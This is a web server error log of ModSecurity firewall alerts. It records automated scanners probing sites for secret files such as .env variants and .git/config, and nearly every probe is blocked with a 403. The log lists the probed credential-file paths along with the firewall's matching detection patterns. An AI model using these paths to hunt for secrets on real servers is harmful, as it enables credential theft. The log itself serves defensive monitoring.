[Sat Jul 19 09:36:53.838371 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aHtLFVPCWV3WY3PgjaNjCAAAAAw"]
[Sat Jul 19 09:36:53.838556 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aHtLFVPCWV3WY3PgjaNjCAAAAAw"]
[Sat Jul 19 09:36:53.860790 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aHtLFVPCWV3WY3PgjaNjCQAAAAw"]
[Sat Jul 19 09:36:53.861048 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aHtLFVPCWV3WY3PgjaNjCQAAAAw"]
[Sat Jul 19 09:36:53.861235 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aHtLFVPCWV3WY3PgjaNjCQAAAAw"]
[Sat Jul 19 09:36:53.883328 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aHtLFVPCWV3WY3PgjaNjCgAAAAw"]
[Sat Jul 19 09:36:53.883501 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aHtLFVPCWV3WY3PgjaNjCgAAAAw"]
[Sat Jul 19 09:36:53.883748 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aHtLFVPCWV3WY3PgjaNjCgAAAAw"]
[Sat Jul 19 09:36:53.883957 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aHtLFVPCWV3WY3PgjaNjCgAAAAw"]
[Sat Jul 19 09:36:53.905888 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHtLFVPCWV3WY3PgjaNjCwAAAAw"]
[Sat Jul 19 09:36:53.906067 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHtLFVPCWV3WY3PgjaNjCwAAAAw"]
[Sat Jul 19 09:36:53.906361 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHtLFVPCWV3WY3PgjaNjCwAAAAw"]
[Sat Jul 19 09:36:53.906565 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aHtLFVPCWV3WY3PgjaNjCwAAAAw"]
[Sat Jul 19 09:36:53.928634 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aHtLFVPCWV3WY3PgjaNjDAAAAAw"]
[Sat Jul 19 09:36:53.928934 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aHtLFVPCWV3WY3PgjaNjDAAAAAw"]
[Sat Jul 19 09:36:53.929150 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aHtLFVPCWV3WY3PgjaNjDAAAAAw"]
[Sat Jul 19 11:36:07.658750 2025] [:error] [pid 1291456] [client 44.204.172.109:34400] [client 44.204.172.109] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHtnB39HRTr3KxPrbnNpMwAAAAQ"]
[Sat Jul 19 11:36:07.659010 2025] [:error] [pid 1291456] [client 44.204.172.109:34400] [client 44.204.172.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHtnB39HRTr3KxPrbnNpMwAAAAQ"]
[Sat Jul 19 11:36:07.659196 2025] [:error] [pid 1291456] [client 44.204.172.109:34400] [client 44.204.172.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHtnB39HRTr3KxPrbnNpMwAAAAQ"]
[Sat Jul 19 11:58:57.948537 2025] [:error] [pid 1291453] [client 77.90.153.170:50090] [client 77.90.153.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHtsYYqT3SVQHvVSWAWMDAAAAAE"]
[Sat Jul 19 11:58:57.951902 2025] [:error] [pid 1291453] [client 77.90.153.170:50090] [client 77.90.153.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHtsYYqT3SVQHvVSWAWMDAAAAAE"]
[Sat Jul 19 11:58:57.952139 2025] [:error] [pid 1291453] [client 77.90.153.170:50090] [client 77.90.153.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHtsYYqT3SVQHvVSWAWMDAAAAAE"]
[Sat Jul 19 18:11:09.380406 2025] [:error] [pid 1292409] [client 46.166.162.40:59260] [client 46.166.162.40] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHvDnfB7y0eI57ET6H6Q2wAAAAk"]
[Sat Jul 19 18:11:09.380682 2025] [:error] [pid 1292409] [client 46.166.162.40:59260] [client 46.166.162.40] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHvDnfB7y0eI57ET6H6Q2wAAAAk"]
[Sat Jul 19 18:11:09.380858 2025] [:error] [pid 1292409] [client 46.166.162.40:59260] [client 46.166.162.40] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHvDnfB7y0eI57ET6H6Q2wAAAAk"]
[Sun Jul 20 04:15:01.614446 2025] [:error] [pid 1314992] [client 170.39.218.51:41422] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHxRJeW0iVD4Ji7MykG8TQAAAAU"]
[Sun Jul 20 04:15:01.614851 2025] [:error] [pid 1314992] [client 170.39.218.51:41422] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHxRJeW0iVD4Ji7MykG8TQAAAAU"]
[Sun Jul 20 04:15:01.615094 2025] [:error] [pid 1314992] [client 170.39.218.51:41422] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHxRJeW0iVD4Ji7MykG8TQAAAAU"]
[Sun Jul 20 04:15:02.026834 2025] [:error] [pid 1314989] [client 170.39.218.51:41434] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aHxRJstM6cl2BOQ9AC-qnQAAAAQ"]
[Sun Jul 20 04:15:02.027087 2025] [:error] [pid 1314989] [client 170.39.218.51:41434] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aHxRJstM6cl2BOQ9AC-qnQAAAAQ"]
[Sun Jul 20 04:15:02.027266 2025] [:error] [pid 1314989] [client 170.39.218.51:41434] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aHxRJstM6cl2BOQ9AC-qnQAAAAQ"]
[Sun Jul 20 04:15:02.332071 2025] [:error] [pid 1314986] [client 170.39.218.51:41450] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aHxRJlJAoIAh0xpeX-DDmgAAAAE"]
[Sun Jul 20 04:15:02.332308 2025] [:error] [pid 1314986] [client 170.39.218.51:41450] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aHxRJlJAoIAh0xpeX-DDmgAAAAE"]
[Sun Jul 20 04:15:02.332466 2025] [:error] [pid 1314986] [client 170.39.218.51:41450] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aHxRJlJAoIAh0xpeX-DDmgAAAAE"]
[Sun Jul 20 04:15:02.532667 2025] [:error] [pid 1314987] [client 170.39.218.51:41464] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aHxRJvDbQFdQV4C-hNSV7wAAAAI"]
[Sun Jul 20 04:15:02.532933 2025] [:error] [pid 1314987] [client 170.39.218.51:41464] [client 170.39.218.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aHxRJvDbQFdQV4C-hNSV7wAAAAI"]
[Sun Jul 20 04:15:02.533115 2025] [:error] [pid 1314987] [client 170.39.218.51:41464] [client 170.39.218.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aHxRJvDbQFdQV4C-hNSV7wAAAAI"]
[Sun Jul 20 04:15:02.905179 2025] [authz_core:error] [pid 1314988] [client 170.39.218.51:52680] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sun Jul 20 04:15:03.219024 2025] [:error] [pid 1314985] [client 170.39.218.51:52686] [client 170.39.218.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aHxRJ4pehbmBRYUOSjdIfQAAAAA"]
